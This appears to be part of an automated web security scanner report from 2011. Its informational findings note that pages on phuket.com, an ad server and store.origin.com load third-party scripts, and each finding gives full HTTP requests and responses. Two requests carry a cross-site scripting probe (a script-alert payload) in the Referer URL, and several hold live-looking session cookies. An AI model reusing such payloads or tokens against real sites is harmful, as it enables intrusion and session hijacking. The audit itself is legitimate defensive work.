Vary: Cookie
Content-Type: text/html; charset=utf-8
Date: Fri, 24 Jun 2011 16:02:15 GMT
Server: lighttpd/1.4.19
Content-Length: 13259

<html>
<head>
<title>sitemap_feedback</title>


</head>
<body>
<div id="content">


<style type="text/css"><!--

/*------FEEDBACK-------*/
div#f
...[SNIP]...
<fieldset id="captcha">


<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Lc4KwAAAAAAADuGvcxSC6fqKmBLqhCk3x5kSSzq"></script>
...[SNIP]...
19.21. http://phuket.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phuket.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: phuket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:34 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:20:34 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 24 Jun 2011 09:58:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 245081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</a>
               <script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://static.asiawebdirect.com/portals/js/portals-scripts.jsi"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://static.asiawebdirect.com/premium/js/s_code.js"></script>
...[SNIP]...
19.22. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; GUID=MTMwODcwNjA4MDsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=ON0AOFJwFob0FE8sIOwJoaAptKvBC0nR1JpwGg02FatBdbdhWbwihXo1GwjmGatBA9qhWbAZhXo1GskmGatB6ijhWbAmhXo1GAY4FatBdDmhWbA/yao1GAVZGatBYimhWbA3Wao1GUY4FatBEHohWbQVrZo1GEcgGatB25lhWbglBao1G0soGatBecphWbgCaao1GUEoGatBVGohWbAvZao1RGAZmjoRw2I9IsfzFA3shdwjkaAdumPAEOphYbLuAoKuGDxsmBwokaI2zCFALRqhY/KECcHiG0pquJQalZsBk6hB1WjxGC7gGw8jGg4tSbAr8aEi0mvBz8qRJypkCgDiGKqAfarhiC; F1=B40QD4EBAAAABAAAAEAAgEA; BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHRGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOIDL!; ROLL=U6APDjeaptEWZ9P!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956561.783617.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 24 Jun 2011 13:26:46 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Fri, 24 Jun 2011 13:26:46 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=WCJBOFJwFob0Fo3sIOwJoaQXtKvBC0nRuIpwGg02F+oBdbdhPawihX4jGwjmG+oBA9qhPaAZhX4jGskmG+oB6ijhPaAmhX4jGAY4F+oBdDmhPaA/ya4jGAVZG+oBYimhPaA3Wa4jGUY4F+oBEHohPaQVrZ4jGEcgG+oB25lhPaglBa4jG0soG+oBecphPagCaa4jGUEoG+oBVGohPaAvZa4jRGAZmjoRp1I9IsfzFA3shdwjkaQLumPAEOphROrZAMKpGG5sQBwSkaYkvChA3hoBWpqbBkWZG/LpeYQt1Y8PwOoBM/oBBdr0GwKvGFEt5bwMvakQcKpA4gohbJwn2a4W; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: F1=BYJkE4kAAAAABU/CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHpGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOIDL!; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: ROLL=U6APDjemptEWS0P!; domain=advertising.com; expires=Sun, 23-Jun-2013 13:26:46 GMT; path=/
Set-Cookie: 93673890=_4e049096,1512334550,783617^956561^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000783617/mnum=0000956561/cstr=93673890=_4e049096,1512334550,783617^956561^1183^0,1_/xsxdata=$xsxdata/bnum=93673890/optn=64?trg="><\/script>
...[SNIP]...
19.23. http://store.origin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64731893897,0)
Date: Fri, 24 Jun 2011 13:43:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 60407


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308923028902:NODE=c2a4901:THREA
...[SNIP]...
<link href="http://store.origin.com" rel="canonical" />

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
19.24. http://store.origin.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/DRHM/store%25253FAction%25253DContinueShopping%252526SiteID%25253Dea%252526Locale%25253Den_US%252526ThemeID%25253D718200%252526Env%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=116274717585,0)
Date: Fri, 24 Jun 2011 14:36:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 64866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926169147:NODE=c2a5301:THREA
...[SNIP]...
<link href="http://store.origin.com" rel="canonical" />

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
19.25. http://store.origin.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253APRODUCTFINDERPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/AddItemToRequisition/ThemeID.718200%252526productID%25253D226783800%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=120569681122,0)
Date: Fri, 24 Jun 2011 14:36:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 26163


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926165255:NODE=c2a5301:THREA
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
19.26. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=146339517893,0)
Date: Fri, 24 Jun 2011 14:36:37 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 39966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926197606:NODE=c2a5301:THREA
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
19.27. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(1)%3C/script%3E84252b80866=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=137749517959,0)
Date: Fri, 24 Jun 2011 14:35:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 39947


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926133816:NODE=c2a5301:THREA
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
19.28. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/pd/ThemeID.718200/productID.201797000

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/ea/en_US/pd/ThemeID.718200/productID.201797000 HTTP/1.1
Host: store.origin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(0x062)%3C/script%3E84252b80866=1
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=688587274.260.0000; ORA_WX_SESSION=10.2.11.49:260-0#0; JSESSIONID=D16C78DD65928965E35E73DFD8E01BF0; VISITOR_ID=971D4E8DFAED43671E5F8C17C533E4FF95647E15D19DC326

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21784792732,0)
Date: Fri, 24 Jun 2011 14:25:39 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app41
Content-Length: 75477


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308925539845:NODE=c2a4101:THREA
...[SNIP]...
<link rel="canonical" href="http://store.origin.com/store/ea/en_US/pd/productID.201797000"/>

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.dltabs.min.js" type="text/javascript"></script>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
19.29. http://store.origin.com/store/ea/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/home/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/ea/home/ HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/home/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21785453355,0)
Date: Fri, 24 Jun 2011 14:36:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 64866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


